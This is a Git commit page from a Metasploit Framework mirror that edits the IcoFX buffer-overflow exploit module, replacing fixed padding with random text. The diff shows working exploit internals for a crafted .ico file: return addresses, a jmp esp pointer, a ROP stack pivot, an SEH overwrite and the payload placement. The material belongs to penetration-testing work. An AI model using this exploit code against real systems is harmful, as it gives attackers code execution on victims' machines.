infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #2817, icofx_bof random things

bug/bundler_fix
William Vu 2014-01-01 22:01:48 -06:00
parent 5805ee17bd b4439a263b
commit d291cd92d7
No known key found for this signature in database
GPG Key ID: E761DCB4C1629024
1 changed files with 5 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
modules/exploits/windows/fileformat/icofx_bof.rb
View File

@ -72,13 +72,13 @@ class Metasploit3 < Msf::Exploit::Remote
# ICONDIRENTRY structures 102 structures are using to overwrite # ICONDIRENTRY structures 102 structures are using to overwrite
# every structure = 16 bytes # every structure = 16 bytes
# 100 structures are used to reach the local variables # 100 structures are used to reach the local variables
ico << "A" * 652 ico << rand_text(652)
ico << [0x0044729d].pack("V") * 20 # ret # rop nops are used to allow code execution with the different opening methods ico << [0x0044729d].pack("V") * 20 # ret # rop nops are used to allow code execution with the different opening methods
ico << [0x0045cc21].pack("V") # jmp esp ico << [0x0045cc21].pack("V") # jmp esp
ico << payload.encoded ico << payload.encoded
ico << "B" * ( ico << rand_text(
1600 - # 1600 = 16 ICONDIRENTRY struct size * 100 1600 - # 1600 = 16 ICONDIRENTRY struct size * 100
652 - # padding 652 - # padding to align the stack pivot
80 - # rop nops size 80 - # rop nops size
4 - # jmp esp pointer size 4 - # jmp esp pointer size
payload.encoded.length payload.encoded.length
@ -86,11 +86,11 @@ class Metasploit3 < Msf::Exploit::Remote
# The next ICONDIRENTRY allows to overwrite the interesting local variables # The next ICONDIRENTRY allows to overwrite the interesting local variables
# on the stack # on the stack
ico << [2].pack("V") # Counter (remaining bytes) saved on the stack ico << [2].pack("V") # Counter (remaining bytes) saved on the stack
ico << "A" * 8 # Padding ico << rand_text(8) # Padding
ico << [0xfffffffe].pack("V") # Index to the dst buffer saved on the stack, allows to point to the SEH handler ico << [0xfffffffe].pack("V") # Index to the dst buffer saved on the stack, allows to point to the SEH handler
# The next ICONDIRENTRY allows to overwrite the seh handler # The next ICONDIRENTRY allows to overwrite the seh handler
ico << [0x00447296].pack("V") # Stackpivot: add esp, 0x800 # pop ebx # ret ico << [0x00447296].pack("V") # Stackpivot: add esp, 0x800 # pop ebx # ret
ico << "B" * (0xc) # padding ico << rand_text(0xc) # padding
return ico return ico
end end